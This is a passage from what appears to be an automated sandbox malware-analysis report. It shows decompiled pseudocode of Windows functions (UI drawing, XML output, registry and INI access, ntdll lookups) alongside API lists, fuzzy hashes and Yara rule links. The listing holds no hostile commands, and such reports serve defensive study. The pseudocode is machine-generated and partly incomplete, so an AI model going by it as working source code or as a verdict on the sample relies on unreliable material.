				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				DrawFrameControl(BeginPaint( *(__ebx + 0x10),  &_v84),  &_v20, 3, 8);
				return EndPaint( *(__ebx + 0x10),  &_v84);
			}





                                                                                                        0x00402ed7
                                                                                                        0x00402eee
                                                                                                        0x00402ef8
                                                                                                        0x00402f00
                                                                                                        0x00402f01
                                                                                                        0x00402f05
                                                                                                        0x00402f0a
                                                                                                        0x00402f1a
                                                                                                        0x00402f30

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000B.00000002.287305945.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 0000000B.00000002.287300268.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287315695.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287325226.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287332421.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
                                                                                                        • String ID:
                                                                                                        • API String ID: 19018683-0
                                                                                                        • Opcode ID: 8c0e1e97105e41a4185fd691eb38b3eaa50651c9f1af749464abe97b92a3298f
                                                                                                        • Instruction ID: c8721ad6730a543cd54d50ae751cb56b62cc93be397439d4b1c9778783e315ec
                                                                                                        • Opcode Fuzzy Hash: 8c0e1e97105e41a4185fd691eb38b3eaa50651c9f1af749464abe97b92a3298f
                                                                                                        • Instruction Fuzzy Hash: 8C01EC72900218EFDF04DFA4DD859FE7B79FB44301F000569EA11AA195DA71A904CF90
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 004079A4, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 57COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 50%
                                                                                                        			E004079A4(void* __edi, void* __esi, intOrPtr _a4, intOrPtr* _a8) {
				void _v514;
				signed short _v516;
				signed short* _t34;
				signed int _t37;
				void* _t40;
				signed short* _t44;
				void* _t46;

				_t40 = __edi;
				E00407343(__edi, _a4, L"<item>\r\n");
				_t37 = 0;
				if( *((intOrPtr*)(__edi + 0x2c)) > 0) {
					do {
						_v516 = _v516 & 0x00000000;
						memset( &_v514, 0, 0x1fc);
						E0040ADF1( *((intOrPtr*)( *_a8))( *( *((intOrPtr*)(__edi + 0x30)) + _t37 * 4),  *((intOrPtr*)(__edi + 0x60))),  *((intOrPtr*)(__edi + 0x64)));
						_t44 =  &_v516;
						E00407250(_t44,  *((intOrPtr*)( *( *((intOrPtr*)(__edi + 0x30)) + _t37 * 4) * 0x14 +  *((intOrPtr*)(__edi + 0x40)) + 0x10)));
						_t34 = _t44;
						_push(_t34);
						_push( *((intOrPtr*)(__edi + 0x64)));
						_push(_t34);
						_push(L"<%s>%s</%s>\r\n");
						_push(0x2000);
						_push( *((intOrPtr*)(__edi + 0x68)));
						L0040B1EC();
						_t46 = _t46 + 0x24;
						E00407343(__edi, _a4,  *((intOrPtr*)(__edi + 0x68)));
						_t37 = _t37 + 1;
					} while (_t37 <  *((intOrPtr*)(__edi + 0x2c)));
				}
				return E00407343(_t40, _a4, L"</item>\r\n");
			}










                                                                                                        0x004079a4
                                                                                                        0x004079b8
                                                                                                        0x004079bd
                                                                                                        0x004079c2
                                                                                                        0x004079c5
                                                                                                        0x004079c5
                                                                                                        0x004079db
                                                                                                        0x004079f7
                                                                                                        0x00407a06
                                                                                                        0x00407a0c
                                                                                                        0x00407a11
                                                                                                        0x00407a13
                                                                                                        0x00407a14
                                                                                                        0x00407a17
                                                                                                        0x00407a18
                                                                                                        0x00407a1d
                                                                                                        0x00407a22
                                                                                                        0x00407a25
                                                                                                        0x00407a2a
                                                                                                        0x00407a35
                                                                                                        0x00407a3a
                                                                                                        0x00407a3b
                                                                                                        0x00407a40
                                                                                                        0x00407a52

                                                                                                        APIs
                                                                                                        • memset.MSVCRT ref: 004079DB
                                                                                                          • Part of subcall function 0040ADF1: memcpy.MSVCRT ref: 0040AE6E
                                                                                                          • Part of subcall function 00407250: wcscpy.MSVCRT ref: 00407255
                                                                                                          • Part of subcall function 00407250: _wcslwr.MSVCRT ref: 00407288
                                                                                                        • _snwprintf.MSVCRT ref: 00407A25
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000B.00000002.287305945.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 0000000B.00000002.287300268.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287315695.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287325226.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287332421.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
                                                                                                        • String ID: <%s>%s</%s>$</item>$<item>
                                                                                                        • API String ID: 1775345501-2769808009
                                                                                                        • Opcode ID: 3db2232b312ed916784b241718d450bfb00e2b25eb8021401c0f03919c4bf03b
                                                                                                        • Instruction ID: c8ba369f0531ab1f4cd0c6f6a7ba1592bf00f2a9533aec28b16f0bdd84d8fa76
                                                                                                        • Opcode Fuzzy Hash: 3db2232b312ed916784b241718d450bfb00e2b25eb8021401c0f03919c4bf03b
                                                                                                        • Instruction Fuzzy Hash: 3D119131A40219BFDB21AB65CC86E5A7B25FF04308F00006AFD0477692C739B965DBD9
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 0040467A, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 44registryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 64%
                                                                                                        			E0040467A(void* __edi) {
				signed int _v8;
				void* _v12;
				void* _v16;
				void _v2062;
				short _v2064;
				int _t16;

				_v8 = _v8 & 0x00000000;
				_t16 = E004043F8( &_v12, 0x20019);
				if(_t16 == 0) {
					_v2064 = _v2064 & _t16;
					memset( &_v2062, _t16, 0x7fe);
					_push(__edi + 0x20a);
					_push(L"%s\\shell\\%s");
					_push(0x3ff);
					_push( &_v2064);
					L0040B1EC();
					if(RegOpenKeyExW(_v12,  &_v2064, 0, 0x20019,  &_v16) == 0) {
						_v8 = 1;
						RegCloseKey(_v16);
					}
				}
				return _v8;
			}









                                                                                                        0x00404683
                                                                                                        0x00404692
                                                                                                        0x00404699
                                                                                                        0x0040469b
                                                                                                        0x004046af
                                                                                                        0x004046ba
                                                                                                        0x004046bc
                                                                                                        0x004046c7
                                                                                                        0x004046cc
                                                                                                        0x004046cd
                                                                                                        0x004046ee
                                                                                                        0x004046f3
                                                                                                        0x004046fa
                                                                                                        0x004046fa
                                                                                                        0x004046ee
                                                                                                        0x00404705

                                                                                                        APIs
                                                                                                        • memset.MSVCRT ref: 004046AF
                                                                                                        • _snwprintf.MSVCRT ref: 004046CD
                                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,?,?,?,?,?,00020019), ref: 004046E6
                                                                                                        • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,00020019), ref: 004046FA
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000B.00000002.287305945.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 0000000B.00000002.287300268.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287315695.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287325226.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287332421.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: CloseOpen_snwprintfmemset
                                                                                                        • String ID: %s\shell\%s
                                                                                                        • API String ID: 1458959524-3196117466
                                                                                                        • Opcode ID: dd937bb9006710e66f977af40412b0b6fd133ebddff1bc1205fab9b1dc2b10fe
                                                                                                        • Instruction ID: 1855bd24da60c853c30f7b3e18bb60aca338c900c60696cbbcdbf1fba26ecf92
                                                                                                        • Opcode Fuzzy Hash: dd937bb9006710e66f977af40412b0b6fd133ebddff1bc1205fab9b1dc2b10fe
                                                                                                        • Instruction Fuzzy Hash: 20011EB5D00218FADB109BD1DD45FDAB7BCEF44314F0041B6AA04F2181EB749B489BA8
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00409D5F, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 16%
                                                                                                        			E00409D5F(void* __ecx, wchar_t* __esi, void* __eflags, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, WCHAR* _a16, long _a20, WCHAR* _a24) {
				signed short _v131076;

				_t25 = __esi;
				E0040B550(0x20000, __ecx);
				if(_a4 == 0) {
					return GetPrivateProfileStringW(_a8, _a12, _a16, __esi, _a20, _a24);
				} else {
					if(__esi == 0 || wcschr(__esi, 0x22) == 0) {
						_push(_a24);
					} else {
						_v131076 = _v131076 & 0x00000000;
						_push(__esi);
						_push(L"\"%s\"");
						_push(0xfffe);
						_push( &_v131076);
						L0040B1EC();
						_push(_a24);
						_push( &_v131076);
					}
					return WritePrivateProfileStringW(_a8, _a12, ??, ??);
				}
			}




                                                                                                        0x00409d5f
                                                                                                        0x00409d67
                                                                                                        0x00409d70
                                                                                                        0x00409ddb
                                                                                                        0x00409d72
                                                                                                        0x00409d74
                                                                                                        0x00409db2
                                                                                                        0x00409d84
                                                                                                        0x00409d84
                                                                                                        0x00409d8c
                                                                                                        0x00409d8d
                                                                                                        0x00409d98
                                                                                                        0x00409d9d
                                                                                                        0x00409d9e
                                                                                                        0x00409da6
                                                                                                        0x00409daf
                                                                                                        0x00409daf
                                                                                                        0x00409dc3
                                                                                                        0x00409dc3

                                                                                                        APIs
                                                                                                        • wcschr.MSVCRT ref: 00409D79
                                                                                                        • _snwprintf.MSVCRT ref: 00409D9E
                                                                                                        • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00409DBC
                                                                                                        • GetPrivateProfileStringW.KERNEL32 ref: 00409DD4
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000B.00000002.287305945.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 0000000B.00000002.287300268.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287315695.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287325226.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287332421.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                                                                        • String ID: "%s"
                                                                                                        • API String ID: 1343145685-3297466227
                                                                                                        • Opcode ID: ba2a529124e3a207c998afa530794a8b3af16421fe15764eebdae90aacee263b
                                                                                                        • Instruction ID: cff84325bbeeabecfb89bf19508a3778b9d9768fc6139f0f3fcaa17558a1ecc1
                                                                                                        • Opcode Fuzzy Hash: ba2a529124e3a207c998afa530794a8b3af16421fe15764eebdae90aacee263b
                                                                                                        • Instruction Fuzzy Hash: BA018B3244421AFADF219F90DC45FDA3B6AEF04348F008065BA14701E3D739C921DB98
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 004047D2, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 31windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 38%
                                                                                                        			E004047D2(long __ecx, void* __eflags, struct HWND__* _a4) {
				char _v2052;
				short _v4100;
				void* __edi;
				long _t15;
				long _t16;

				_t15 = __ecx;
				E0040B550(0x1000, __ecx);
				_t16 = _t15;
				if(_t16 == 0) {
					_t16 = GetLastError();
				}
				E00404706(_t16,  &_v2052);
				_push( &_v2052);
				_push(_t16);
				_push(L"Error %d: %s");
				_push(0x400);
				_push( &_v4100);
				L0040B1EC();
				return MessageBoxW(_a4,  &_v4100, L"Error", 0x30);
			}








                                                                                                        0x004047d2
                                                                                                        0x004047da
                                                                                                        0x004047e0
                                                                                                        0x004047e4
                                                                                                        0x004047ec
                                                                                                        0x004047ec
                                                                                                        0x004047f5
                                                                                                        0x00404800
                                                                                                        0x00404801
                                                                                                        0x00404802
                                                                                                        0x0040480d
                                                                                                        0x00404812
                                                                                                        0x00404813
                                                                                                        0x00404834

                                                                                                        APIs
                                                                                                        • GetLastError.KERNEL32(?,?,004035EB,?,?), ref: 004047E6
                                                                                                        • _snwprintf.MSVCRT ref: 00404813
                                                                                                        • MessageBoxW.USER32(?,?,Error,00000030), ref: 0040482C
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000B.00000002.287305945.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 0000000B.00000002.287300268.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287315695.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287325226.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287332421.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLastMessage_snwprintf
                                                                                                        • String ID: Error$Error %d: %s
                                                                                                        • API String ID: 313946961-1552265934
                                                                                                        • Opcode ID: 9fa9ceadd2aea683486b90f32a73d9d70e1e2e007ee85f632c4fe4fcea7526ce
                                                                                                        • Instruction ID: 90e5118ee4f46ea14b6138c5fdcdbe0805ab296af9aaa7bfd3b1d45c15712702
                                                                                                        • Opcode Fuzzy Hash: 9fa9ceadd2aea683486b90f32a73d9d70e1e2e007ee85f632c4fe4fcea7526ce
                                                                                                        • Instruction Fuzzy Hash: 30F08975500208A6C711A795CC46FD572ACEB44785F0401B6B604F31C1DB78AA448A9C
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 004068EC, Relevance: 7.6, APIs: 6, Instructions: 131COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 90%
                                                                                                        			E004068EC(intOrPtr* __eax, void* __eflags, intOrPtr _a4) {
				void* _v8;
				signed int _v12;
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				signed int _t74;
				signed int _t76;
				signed short _t85;
				signed int _t87;
				intOrPtr _t88;
				signed short _t93;
				void* _t95;
				signed int _t124;
				signed int _t126;
				signed int _t128;
				intOrPtr* _t131;
				signed int _t135;
				signed int _t137;
				signed int _t138;
				void* _t141;
				void* _t142;
				void* _t146;

				_t142 = __eflags;
				_push(_t102);
				_t131 = __eax;
				 *((intOrPtr*)(__eax + 4)) =  *((intOrPtr*)( *__eax + 0x68))();
				E00406746(__eax);
				 *(_t131 + 0x38) =  *(_t131 + 0x38) & 0x00000000;
				_t135 = 5;
				 *((intOrPtr*)(_t131 + 0x2a0)) = _a4;
				_t124 = 0x14;
				_t74 = _t135 * _t124;
				 *(_t131 + 0x2d0) = _t135;
				_push( ~(0 | _t142 > 0x00000000) | _t74);
				L0040B26C();
				 *(_t131 + 0x2d4) = _t74;
				_t126 = 0x14;
				_t76 = _t135 * _t126;
				_push( ~(0 | _t142 > 0x00000000) | _t76);
				L0040B26C();
				_t95 = 0x40f008;
				 *(_t131 + 0x40) = _t76;
				_v8 = 0x40f008;
				do {
					_t137 =  *_t95 * 0x14;
					memcpy( *(_t131 + 0x2d4) + _t137, _t95, 0x14);
					_t24 = _t95 + 0x14; // 0x40f01c
					memcpy( *(_t131 + 0x40) + _t137, _t24, 0x14);
					_t85 =  *( *(_t131 + 0x2d4) + _t137 + 0x10);
					_t141 = _t141 + 0x18;
					_v12 = _t85;
					 *( *(_t131 + 0x40) + _t137 + 0x10) = _t85;
					if((_t85 & 0xffff0000) == 0) {
						 *( *(_t131 + 0x2d4) + _t137 + 0x10) = E00405B81(_t85 & 0x0000ffff);
						_t93 = E00405B81(_v12 | 0x00010000);
						_t95 = _v8;
						 *( *(_t131 + 0x40) + _t137 + 0x10) = _t93;
					}
					_t95 = _t95 + 0x28;
					_t146 = _t95 - 0x40f0d0;
					_v8 = _t95;
				} while (_t146 < 0);
				 *(_t131 + 0x44) =  *(_t131 + 0x44) & 0x00000000;
				_t138 = 5;
				_t128 = 4;
				_t87 = _t138 * _t128;
				 *((intOrPtr*)(_t131 + 0x48)) = 1;
				 *(_t131 + 0x2c) = _t138;
				 *((intOrPtr*)(_t131 + 0x28)) = 0x20;
				_push( ~(0 | _t146 > 0x00000000) | _t87);
				L0040B26C();
				_push(0xc);
				 *(_t131 + 0x30) = _t87;
				L0040B26C();
				_t139 = _t87;
				if(_t87 == 0) {
					_t88 = 0;
					__eflags = 0;
				} else {
					_t88 = E00406607(_a4,  *((intOrPtr*)(_t131 + 0x58)), _t139);
				}
				 *((intOrPtr*)(_t131 + 0x2c0)) = _t88;
				 *((intOrPtr*)(_t131 + 0x4c)) = 1;
				 *((intOrPtr*)(_t131 + 0x50)) = 0;
				 *((intOrPtr*)(_t131 + 0x2b4)) = 1;
				 *((intOrPtr*)(_t131 + 0x2b8)) = 0;
				 *((intOrPtr*)(_t131 + 0x2bc)) = 0;
				 *((intOrPtr*)(_t131 + 0x2c4)) = 1;
				 *((intOrPtr*)(_t131 + 0x2c8)) = 1;
				 *((intOrPtr*)(_t131 + 0x334)) = 0x32;
				 *((intOrPtr*)(_t131 + 0x5c)) = 0xffffff;
				return E0040686C(_t131);
			}


























                                                                                                        0x004068ec
                                                                                                        0x004068f0
                                                                                                        0x004068f4
                                                                                                        0x004068ff
                                                                                                        0x00406902
                                                                                                        0x0040690a
                                                                                                        0x00406910
                                                                                                        0x00406911
                                                                                                        0x0040691b
                                                                                                        0x0040691e
                                                                                                        0x00406923
                                                                                                        0x0040692d
                                                                                                        0x0040692e
                                                                                                        0x00406933
                                                                                                        0x0040693d
                                                                                                        0x00406940
                                                                                                        0x00406949
                                                                                                        0x0040694a
                                                                                                        0x00406950
                                                                                                        0x00406956
                                                                                                        0x00406959
                                                                                                        0x0040695c
                                                                                                        0x00406964
                                                                                                        0x0040696d
                                                                                                        0x00406974
                                                                                                        0x0040697e
                                                                                                        0x00406989
                                                                                                        0x00406990
                                                                                                        0x00406998
                                                                                                        0x0040699b
                                                                                                        0x0040699f
                                                                                                        0x004069b8
                                                                                                        0x004069bc
                                                                                                        0x004069c4
                                                                                                        0x004069c7
                                                                                                        0x004069c7
                                                                                                        0x004069cb
                                                                                                        0x004069ce
                                                                                                        0x004069d4
                                                                                                        0x004069d4
                                                                                                        0x004069d9
                                                                                                        0x004069df
                                                                                                        0x004069e6
                                                                                                        0x004069ea
                                                                                                        0x004069ef
                                                                                                        0x004069f2
                                                                                                        0x004069f5
                                                                                                        0x00406a00
                                                                                                        0x00406a01
                                                                                                        0x00406a06
                                                                                                        0x00406a08
                                                                                                        0x00406a0b
                                                                                                        0x00406a10
                                                                                                        0x00406a16
                                                                                                        0x00406a25
                                                                                                        0x00406a25
                                                                                                        0x00406a18
                                                                                                        0x00406a1e
                                                                                                        0x00406a1e
                                                                                                        0x00406a27
                                                                                                        0x00406a2f
                                                                                                        0x00406a32
                                                                                                        0x00406a35
                                                                                                        0x00406a3b
                                                                                                        0x00406a41
                                                                                                        0x00406a47
                                                                                                        0x00406a4d
                                                                                                        0x00406a53
                                                                                                        0x00406a5d
                                                                                                        0x00406a6d

                                                                                                        APIs
                                                                                                          • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406752
                                                                                                          • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406760
                                                                                                          • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406771
                                                                                                          • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406788
                                                                                                          • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406791
                                                                                                        • ??2@YAPAXI@Z.MSVCRT ref: 0040692E
                                                                                                        • ??2@YAPAXI@Z.MSVCRT ref: 0040694A
                                                                                                        • memcpy.MSVCRT ref: 0040696D
                                                                                                        • memcpy.MSVCRT ref: 0040697E
                                                                                                        • ??2@YAPAXI@Z.MSVCRT ref: 00406A01
                                                                                                        • ??2@YAPAXI@Z.MSVCRT ref: 00406A0B
                                                                                                          • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,00403490), ref: 00405BC0
                                                                                                          • Part of subcall function 00405B81: LoadStringW.USER32(00000000,000001F5,?), ref: 00405C59
                                                                                                          • Part of subcall function 00405B81: memcpy.MSVCRT ref: 00405C99
                                                                                                          • Part of subcall function 00405B81: wcscpy.MSVCRT ref: 00405C02
                                                                                                          • Part of subcall function 00405B81: wcslen.MSVCRT ref: 00405C20
                                                                                                          • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,?,00403490), ref: 00405C2E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000B.00000002.287305945.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 0000000B.00000002.287300268.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287315695.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287325226.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287332421.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: ??3@$??2@$memcpy$HandleModule$LoadStringwcscpywcslen
                                                                                                        • String ID:
                                                                                                        • API String ID: 975042529-0
                                                                                                        • Opcode ID: 7b5c259927b59544c1da32c87fb64e8a434fc950baf11122839f6010e947eddb
                                                                                                        • Instruction ID: 1f3882e7c97b8b8272a376ef7761bc0b0e9511dafd47f947fc31f4e13e233f39
                                                                                                        • Opcode Fuzzy Hash: 7b5c259927b59544c1da32c87fb64e8a434fc950baf11122839f6010e947eddb
                                                                                                        • Instruction Fuzzy Hash: 53414EB1B01715AFD718DF39C88A75AFBA4FB08314F10422FE519D7691D775A8108BC8
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 004097A9, Relevance: 7.6, APIs: 5, Instructions: 112COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 83%
                                                                                                        			E004097A9(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
				int _v8;
				int _v12;
				intOrPtr _v16;
				void* _v20;
				int _v24;
				void _v56;
				char _v584;
				char _v588;
				char _v41548;
				void* __edi;
				void* _t40;
				void _t46;
				intOrPtr _t47;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr _t67;
				intOrPtr _t71;
				int _t77;
				void* _t80;
				void* _t81;
				void* _t82;
				void* _t83;

				E0040B550(0xa248, __ecx);
				_t77 = 0;
				_v8 = 0;
				E00408E31();
				_t40 =  *0x41c47c;
				if(_t40 != 0) {
					_t40 =  *_t40(5,  &_v41548, 0xa000,  &_v8);
				}
				if(_v8 == _t77) {
					_v8 = 0x186a0;
				}
				_v8 = _v8 + 0x3e80;
				_push(_v8);
				L0040B26C();
				_t81 = _t40;
				_v20 = _t81;
				memset(_t81, _t77, _v8);
				_t83 = _t82 + 0x10;
				_v24 = _t77;
				E00408E31();
				E00408F2A(0x41c47c, _t81, _v8,  &_v24);
				L5:
				while(1) {
					if( *((intOrPtr*)(_t81 + 0x3c)) == _t77) {
						L16:
						_t46 =  *_t81;
						_t77 = 0;
						if(_t46 == 0) {
							_push(_v20);
							L0040B272();
							return _t46;
						}
						_t81 = _t81 + _t46;
						continue;
					}
					_t47 = _a4;
					_t71 =  *((intOrPtr*)(_t47 + 0x34));
					_v12 = _t77;
					_v16 = _t71;
					if(_t71 <= _t77) {
						L10:
						_t66 = 0;
						L11:
						if(_t66 == 0) {
							E004090AF( &_v588);
							E00404923(0x104,  &_v584,  *((intOrPtr*)(_t81 + 0x3c)));
							_t32 = _t81 + 0x20; // 0x20
							memcpy( &_v56, _t32, 8);
							_t83 = _t83 + 0x10;
							E004099ED(_a4 + 0x28,  &_v588);
						} else {
							_t26 = _t66 + 4; // 0x4
							_t72 = _t26;
							if( *_t26 == 0) {
								E00404923(0x104, _t72,  *((intOrPtr*)(_t81 + 0x3c)));
								_t28 = _t81 + 0x20; // 0x20
								memcpy(_t66 + 0x214, _t28, 8);
								_t83 = _t83 + 0x10;
							}
						}
						goto L16;
					}
					_t67 =  *((intOrPtr*)(_t81 + 0x44));
					_t80 = _t47 + 0x28;
					while(1) {
						_t64 = E00405A92(_v12, _t80);
						if( *_t64 == _t67) {
							break;
						}
						_v12 = _v12 + 1;
						if(_v12 < _v16) {
							continue;
						}
						goto L10;
					}
					_t66 = _t64;
					goto L11;
				}
			}

























                                                                                                        0x004097b1
                                                                                                        0x004097b9
                                                                                                        0x004097bb
                                                                                                        0x004097be
                                                                                                        0x004097c3
                                                                                                        0x004097ca
                                                                                                        0x004097de
                                                                                                        0x004097de
                                                                                                        0x004097e3
                                                                                                        0x004097e5
                                                                                                        0x004097e5
                                                                                                        0x004097ec
                                                                                                        0x004097f3
                                                                                                        0x004097f6
                                                                                                        0x004097fe
                                                                                                        0x00409802
                                                                                                        0x00409805
                                                                                                        0x0040980a
                                                                                                        0x0040980d
                                                                                                        0x00409810
                                                                                                        0x00409822
                                                                                                        0x00000000
                                                                                                        0x00409827
                                                                                                        0x0040982a
                                                                                                        0x004098da
                                                                                                        0x004098da
                                                                                                        0x004098dc
                                                                                                        0x004098e0
                                                                                                        0x004098e9
                                                                                                        0x004098ec
                                                                                                        0x004098f6
                                                                                                        0x004098f6
                                                                                                        0x004098e2
                                                                                                        0x00000000
                                                                                                        0x004098e2
                                                                                                        0x00409830
                                                                                                        0x00409833
                                                                                                        0x00409838
                                                                                                        0x0040983b
                                                                                                        0x0040983e
                                                                                                        0x0040985f
                                                                                                        0x0040985f
                                                                                                        0x00409861
                                                                                                        0x00409863
                                                                                                        0x0040989e
                                                                                                        0x004098b1
                                                                                                        0x004098b8
                                                                                                        0x004098c0
                                                                                                        0x004098c5
                                                                                                        0x004098d5
                                                                                                        0x00409865
                                                                                                        0x00409865
                                                                                                        0x00409865
                                                                                                        0x0040986c
                                                                                                        0x00409878
                                                                                                        0x0040987f
                                                                                                        0x0040988a
                                                                                                        0x0040988f
                                                                                                        0x0040988f
                                                                                                        0x0040986c
                                                                                                        0x00000000
                                                                                                        0x00409863
                                                                                                        0x00409840
                                                                                                        0x00409843
                                                                                                        0x00409846
                                                                                                        0x0040984b
                                                                                                        0x00409852
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00409854
                                                                                                        0x0040985d
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x0040985d
                                                                                                        0x00409894
                                                                                                        0x00000000
                                                                                                        0x00409894

                                                                                                        APIs
                                                                                                          • Part of subcall function 00408E31: GetModuleHandleW.KERNEL32(ntdll.dll,?,004097C3), ref: 00408E44
                                                                                                          • Part of subcall function 00408E31: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00408E5B
                                                                                                          • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtLoadDriver), ref: 00408E6D
                                                                                                          • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 00408E7F
                                                                                                          • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 00408E91
                                                                                                          • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 00408EA3
                                                                                                          • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtQueryObject), ref: 00408EB5
                                                                                                          • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtOpenThread), ref: 00408EC7
                                                                                                          • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtClose), ref: 00408ED9
                                                                                                          • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtQueryInformationThread), ref: 00408EEB
                                                                                                          • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtSuspendThread), ref: 00408EFD
                                                                                                          • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtResumeThread), ref: 00408F0F
                                                                                                          • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtTerminateThread), ref: 00408F21
                                                                                                        • ??2@YAPAXI@Z.MSVCRT ref: 004097F6
                                                                                                        • memset.MSVCRT ref: 00409805
                                                                                                        • memcpy.MSVCRT ref: 0040988A
                                                                                                        • memcpy.MSVCRT ref: 004098C0
                                                                                                        • ??3@YAXPAX@Z.MSVCRT ref: 004098EC
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000B.00000002.287305945.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 0000000B.00000002.287300268.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287315695.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287325226.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287332421.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
